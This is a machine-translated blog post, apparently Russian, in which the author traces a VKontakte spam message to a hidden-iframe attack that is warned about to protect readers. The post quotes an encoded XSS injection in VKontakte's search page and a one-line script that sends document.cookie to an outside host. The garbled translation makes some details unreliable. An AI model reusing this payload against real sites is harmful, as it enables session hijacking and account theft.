13:03 How to become a peddler spam vkontakte out of curiosity | |
| Just a few minutes ago I managed to send 200 + messages to your friends VKontakte. Of course it was a spam message as follows: Hi I delete a contact, very much spam comes ((now delete my page, if something is needed, then call me on the Mobile phone or look for me here vkontakte.ru / away.php? to =... I have there own page under my imenem.eto not spam, send out to all my friends ...). Actually surprise was due to the fact that: 1. I use Linux and Linux only wherever possible. 2. VKontakte used only at home again, purely out of Linux 3. On facebook and the post office, attached to it are sufficiently cryptographically strong passwords from a 10 + character alphabet and numbers, yes, I'm paranoid Important All subsequent referrals outside of this article for your own safety, I advise to be carried out only if you be logged out of facebook. The first thing I decided to see where it leads the link that I sent out. The link led to a site vk-foto.ru, which immediately redirect to odnonochniki.ru /? rid = 484 From the analysis of "odnonochnikov "I decided to start. Still nothing malicious was observed. " Hmm, "said the harsh Siberian peasants I closed the Opera House, and opened faerfoks. The first step in the Web Developer Toolbar I disabled the transition to META-redirect and added Firebug for vk-foto.ru. Convinced that Firefox has, I be logged VKontakte, I went to the site. Analysis of HTML code to quickly find desired: < iframe src = 'http://vk-foto.ru/2/1.php' style = 'display: none;'> </ iframe> already anticipating the answer to, I typed the said address and obtained ... 404 Apache. Well, then should dig deeper deeper. To vk-foto including panels Net Firebug'a, reload the page and began to watch what is loaded: Seeing this, I cursed myself last words. It was for that: 1. Not everything that looks like a 404 Apache is it. HTTP return code should look always 2. After seeing "404" I do not even bother to look in the code So, another iframe: <iframe src = vkontakte.ru / gsearch.php? from = ads & section = ads & c [type] = 1 & c [% 22% 3E% 3Cscript% 20% 20src% 20% 3d% 20http : / / webzer.vov.ru / vk.js% 20% 20% 3E% 3C/script% 3E] = 2 width = '0 'height = '0' style = 'display: none'> </ iframe> ; Hm. But this is similar to XSS Vkontakte. On page search drain external Javascript. Its contents are just like an orange: location.href = 'http://webzer.vov. ru / css / log.php? '+ document.cookie So the cookie facebook go to the host side. What follows from all this:
DISCLAIMER: I am well aware that professionals in the field of information security, I did not say anything new. This post is aimed more at ordinary IT-Schnick, and is designed to protect them from stepping on my rake _________ The text was drafted in HabraRedaktore | |
|
| |
| Total comments: 0 | |